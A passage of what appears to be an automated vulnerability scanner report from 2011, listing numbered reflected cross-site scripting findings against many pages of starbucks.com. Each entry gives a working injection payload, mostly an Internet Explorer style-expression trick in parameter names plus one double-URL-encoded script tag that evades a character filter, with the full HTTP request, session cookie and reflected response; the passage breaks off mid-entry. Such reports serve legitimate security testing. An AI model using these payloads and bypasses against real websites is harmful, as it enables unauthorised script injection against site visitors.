Host:   http://www.starbucks.com
Path:   /customer-service/faqs/card

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e00"style%3d"x%3aexpression(alert(1))"c89dda96f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 58e00"style="x:expression(alert(1))"c89dda96f09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/card?58e00"style%3d"x%3aexpression(alert(1))"c89dda96f09=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:06 GMT
Connection: close
Content-Length: 87900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/card?58e00"style="x:expression(alert(1))"c89dda96f09=1"/>
...[SNIP]...

1.686. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c52"style%3d"x%3aexpression(alert(1))"411f5c964e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64c52"style="x:expression(alert(1))"411f5c964e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/coffee?64c52"style%3d"x%3aexpression(alert(1))"411f5c964e5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:48 GMT
Connection: close
Content-Length: 37606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffee?64c52"style="x:expression(alert(1))"411f5c964e5=1"/>
...[SNIP]...

1.687. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 835ba"style%3d"x%3aexpression(alert(1))"de67136c231 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 835ba"style="x:expression(alert(1))"de67136c231 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/coffeehouse?835ba"style%3d"x%3aexpression(alert(1))"de67136c231=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:16 GMT
Connection: close
Content-Length: 59203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffeehouse?835ba"style="x:expression(alert(1))"de67136c231=1"/>
...[SNIP]...

1.688. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/menu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b07"style%3d"x%3aexpression(alert(1))"d430c70698c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67b07"style="x:expression(alert(1))"d430c70698c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/menu?67b07"style%3d"x%3aexpression(alert(1))"d430c70698c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:46 GMT
Connection: close
Content-Length: 37148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/menu?67b07"style="x:expression(alert(1))"d430c70698c=1"/>
...[SNIP]...

1.689. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/responsibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82a22"style%3d"x%3aexpression(alert(1))"ae90a773c06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82a22"style="x:expression(alert(1))"ae90a773c06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/responsibility?82a22"style%3d"x%3aexpression(alert(1))"ae90a773c06=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:05 GMT
Connection: close
Content-Length: 37371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/responsibility?82a22"style="x:expression(alert(1))"ae90a773c06=1"/>
...[SNIP]...

1.690. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/shop

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52686"style%3d"x%3aexpression(alert(1))"0dd78febff8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52686"style="x:expression(alert(1))"0dd78febff8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/shop?52686"style%3d"x%3aexpression(alert(1))"0dd78febff8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:47 GMT
Connection: close
Content-Length: 51738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/shop?52686"style="x:expression(alert(1))"0dd78febff8=1"/>
...[SNIP]...

1.691. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06e7"style%3d"x%3aexpression(alert(1))"79ab42fc008 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f06e7"style="x:expression(alert(1))"79ab42fc008 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu?f06e7"style%3d"x%3aexpression(alert(1))"79ab42fc008=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/search?keywords=%27
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.2.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:04:51 GMT
Content-Length: 73370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu?f06e7"style="x:expression(alert(1))"79ab42fc008=1"/>
...[SNIP]...

1.692. http://www.starbucks.com/menu/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfba3"style%3d"x%3aexpression(alert(1))"49bff4af7b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfba3"style="x:expression(alert(1))"49bff4af7b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /menu/?dfba3"style%3d"x%3aexpression(alert(1))"49bff4af7b5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:07 GMT
Connection: close
Content-Length: 73370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu?dfba3"style="x:expression(alert(1))"49bff4af7b5=1"/>
...[SNIP]...

1.693. http://www.starbucks.com/menu/catalog/nutrition [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd71c"style%3d"x%3aexpression(alert(1))"a1cc417fc6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd71c"style="x:expression(alert(1))"a1cc417fc6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/catalog/nutrition?drink=bottled-drinks&cd71c"style%3d"x%3aexpression(alert(1))"a1cc417fc6c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:57 GMT
Connection: close
Content-Length: 45151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/catalog/nutrition?drink=bottled-drinks&cd71c"style="x:expression(alert(1))"a1cc417fc6c=1"/>
...[SNIP]...

1.694. http://www.starbucks.com/menu/catalog/nutrition [wellness parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The value of the wellness request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7b93903311e was submitted in the wellness parameter. This input was echoed as b4984"><script>alert(1)</script>7b93903311e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the wellness request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /menu/catalog/nutrition?food=all&wellness=high-fiberb4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7b93903311e HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:31 GMT
Connection: close
Content-Length: 54080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<a href="http://www.starbucks.com:80/menu/catalog/nutrition?food=all&wellness=high-fiberb4984"><script>alert(1)</script>7b93903311e&page=2">
...[SNIP]...

1.695. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload decb7"style%3d"x%3aexpression(alert(1))"f7af35945af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as decb7"style="x:expression(alert(1))"f7af35945af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks?decb7"style%3d"x%3aexpression(alert(1))"f7af35945af=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:39 GMT
Connection: close
Content-Length: 62628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks?decb7"style="x:expression(alert(1))"f7af35945af=1"/>
...[SNIP]...

1.696. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f952b"style%3d"x%3aexpression(alert(1))"627ac60126a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f952b"style="x:expression(alert(1))"627ac60126a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha?f952b"style%3d"x%3aexpression(alert(1))"627ac60126a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:36 GMT
Connection: close
Content-Length: 39912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha?f952b"style="x:expression(alert(1))"627ac60126a=1"/>
...[SNIP]...

1.697. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5154"style%3d"x%3aexpression(alert(1))"95d490ebdf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5154"style="x:expression(alert(1))"95d490ebdf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-mocha?e5154"style%3d"x%3aexpression(alert(1))"95d490ebdf8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:31 GMT
Connection: close
Content-Length: 39835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha?e5154"style="x:expression(alert(1))"95d490ebdf8=1"/>
...[SNIP]...

1.698. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-vanilla

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a3a"style%3d"x%3aexpression(alert(1))"a035c85f5f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2a3a"style="x:expression(alert(1))"a035c85f5f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-vanilla?d2a3a"style%3d"x%3aexpression(alert(1))"a035c85f5f9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:30 GMT
Connection: close
Content-Length: 39905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla?d2a3a"style="x:expression(alert(1))"a035c85f5f9=1"/>
...[SNIP]...

1.699. http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy

Issue detail

